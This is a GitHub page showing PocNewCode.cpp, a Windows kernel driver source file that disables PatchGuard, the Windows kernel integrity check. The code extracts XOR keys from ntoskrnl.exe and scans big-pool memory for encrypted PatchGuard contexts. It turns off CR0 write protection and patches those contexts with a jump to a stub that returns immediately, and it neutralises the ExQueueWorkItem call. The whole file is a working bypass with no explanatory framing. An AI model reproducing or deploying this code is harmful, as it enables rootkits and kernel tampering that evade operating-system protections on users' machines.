-
Notifications
You must be signed in to change notification settings - Fork 141
/
Copy pathPocNewCode.cpp
189 lines (183 loc) · 5.12 KB
/
PocNewCode.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
#include "stdafx.h"
namespace ddk::patchguard
{
DWORD64 PreKey1 = 0x4808588948c48b48ull;
DWORD64 PreKey2 = 0x5518788948107089ull;
DWORD64 Key1 = 0;
DWORD64 Key2 = 0;
ULONG_PTR g_ExQueueWorkItem = 0;
PVOID g_FreePg = nullptr;
ULONG_PTR ScanMinSize = 0;
void get_key()
{
PVOID lpNtMem = nullptr;
auto st = ddk::util::LoadFileToMem(L"\\SystemRoot\\System32\\ntoskrnl.exe", &lpNtMem);
if (!NT_SUCCESS(st))
{
LOG_DEBUG("OpenFile Failed\r\n");
return;
}
if (!lpNtMem)
{
LOG_DEBUG("Load File Failed\r\n");
return;
}
auto exit1 = std::experimental::make_scope_exit([&]() {
if (lpNtMem)
{
ExFreePool(lpNtMem);
}
});
//找到节表INITKDBG
auto dos_header = reinterpret_cast<PIMAGE_DOS_HEADER>(lpNtMem);
auto pNtHeader = reinterpret_cast<PIMAGE_NT_HEADERS>((PUCHAR)lpNtMem + dos_header->e_lfanew);
auto NumSections = pNtHeader->FileHeader.NumberOfSections;
//LoadFileToMem用宏一些系统会爆炸
auto pSections = reinterpret_cast<PIMAGE_SECTION_HEADER>((PUCHAR)pNtHeader + sizeof(IMAGE_NT_HEADERS));
auto pScan = (PUCHAR)nullptr;
auto ScanSize = 0;
for (auto i=0;i<NumSections;i++)
{
if (memcmp(pSections[i].Name, "INITKDBG", 8) == 0)
{
pScan = (PUCHAR)lpNtMem + pSections[i].VirtualAddress;
ScanSize = max(pSections[i].SizeOfRawData, \
pSections[i].Misc.VirtualSize);
ScanMinSize = pSections[i].SizeOfRawData;
break;
}
}
if (!pScan)
{
LOG_DEBUG("Find Section Failed\r\n");
return;
}
//找key1,key2
if (pScan)
{
for (auto i=0;i<ScanSize;i++)
{
if (*(DWORD64 *)(&pScan[i]) == PreKey1
&&ScanSize>i+0x800+0x10)
{
PreKey2 = *(DWORD64 *)(&pScan[i + 8]);
Key1 = *(DWORD64 *)(&pScan[i + 0x800]);
Key2 = *(DWORD64 *)(&pScan[i + 0x800 + 8]);
break;
}
}
}
}
VOID
NewExQueueWorkItem(
_Inout_ __drv_aliasesMem PWORK_QUEUE_ITEM WorkItem,
_In_ WORK_QUEUE_TYPE QueueType
)
{
return;
}
ULONG_PTR NewExecPatchGuard(ULONG_PTR Unuse, ULONG_PTR Context)
{
for (auto i = 0x0E8; i < 0x120; i += 8)
{
if (*(ULONG_PTR*)(Context + i) == g_ExQueueWorkItem)
{
*(ULONG_PTR*)(Context + i) = (ULONG_PTR)NewExQueueWorkItem;
break;
}
}
return Context;
}
bool PocScanPg(PVOID BaseAddress, SIZE_T _Size,bool bBigPool=false)
{
if (!bBigPool)
{
if (_Size == PAGE_SIZE)
{
PUCHAR pAccessPage = (PUCHAR)BaseAddress + _Size + 0x800;
if (MmIsAddressValid(pAccessPage))
{
_Size += PAGE_SIZE;
}
}
}
for (auto i = SIZE_T(0); i < _Size; i++)
{
//下面攻击密文pg
if ((i + 0x800 + 0x10) < _Size
&& (ULONG_PTR)((PUCHAR)BaseAddress + i + 0x800 + 0x10) > (ULONG_PTR)BaseAddress
&& MmIsAddressValid(PVOID((PUCHAR)BaseAddress + i))
&& MmIsAddressValid(PVOID((PUCHAR)BaseAddress + i + 0x8))
&& MmIsAddressValid(PVOID((PUCHAR)BaseAddress + i + 0x800))
&& MmIsAddressValid(PVOID((PUCHAR)BaseAddress + i + 0x800 + 0x8))
)
{
auto TempKey1 = *(ULONG_PTR*)((PUCHAR)BaseAddress + i) ^ PreKey1;
auto TempKey2 = *(ULONG_PTR*)((PUCHAR)BaseAddress + i + 0x8) ^ PreKey2;
if ((*(ULONG_PTR*)((PUCHAR)BaseAddress + i + 0x800) ^ Key1) == TempKey1 &&
(*(ULONG_PTR*)((PUCHAR)BaseAddress + i + 0x800 + 0x8) ^ Key2) == TempKey2)
{
LOG_DEBUG("ExecPatchGuard address:%p TempKey1:%p TempKey2:%p\n", (PUCHAR)BaseAddress + i, TempKey1, TempKey2);
UCHAR Code[0x10] = { 0 };
memcpy(Code, "\x48\xB8\x21\x43\x65\x87\x78\x56\x34\x12\xFF\xE0\x90\x90\x90\x90", 0x10);
//MakeWriteAble
*(ULONG_PTR*)(Code + 0x2) = (ULONG_PTR)g_FreePg;
_disable();
__writecr0(__readcr0() & (~(0x10000)));
*(ULONG_PTR*)((PUCHAR)BaseAddress + i) = *(ULONG_PTR*)Code ^ TempKey1;
*(ULONG_PTR*)((PUCHAR)BaseAddress + i + 0x8) = *(ULONG_PTR*)(Code + 0x8) ^ TempKey2;
__writecr0(__readcr0() ^ 0x10000);
_enable();
return true;
}
}
}
return false;
}
void disable_pg_bigPool()
{
//使用BigPool版本
if (!Key1 || !Key2)
{
get_key();
}
if (!Key1 || !Key2)
{
LOG_DEBUG("Find Key Failed\r\n");
return;
}
if (!g_FreePg)
{
g_FreePg = ExAllocatePoolWithTag(NonPagedPool, 0x10, 'fktp');
if (!g_FreePg)
{
LOG_DEBUG("Allocate Free Pg Failed\r\n");
return;
}
UCHAR _FreePg[] = { 0x48,0x83,0xC4,0x30,0xC3 };
RtlCopyMemory(g_FreePg, _FreePg, sizeof(_FreePg));
}
LOG_DEBUG("Key1=%p Key2=%p\r\n", Key1, Key2);
g_ExQueueWorkItem = (ULONG_PTR)ddk::util::get_proc_address("ExQueueWorkItem");
auto pBigPoolInfo = reinterpret_cast<PSYSTEM_BIGPOOL_INFORMATION>(ddk::util::get_sysinfo(SystemBigPoolInformation));
if (pBigPoolInfo)
{
auto exit1 = std::experimental::make_scope_exit([&]() {
free(pBigPoolInfo);
});
for (auto i = 0; i < pBigPoolInfo->Count; i++) {
auto poolEntry = pBigPoolInfo->AllocatedInfo[i];
if(poolEntry.SizeInBytes>=ScanMinSize)
{
if (MmIsAddressValid(poolEntry.VirtualAddress))
{
if (PocScanPg(poolEntry.VirtualAddress, poolEntry.SizeInBytes, true))
{
LOG_DEBUG("Tag: %.*s, Address: 0x%p, Size: 0x%p\r\n", 4, poolEntry.Tag, poolEntry.VirtualAddress, (PVOID)poolEntry.SizeInBytes);
}
}
}
}
}
}
}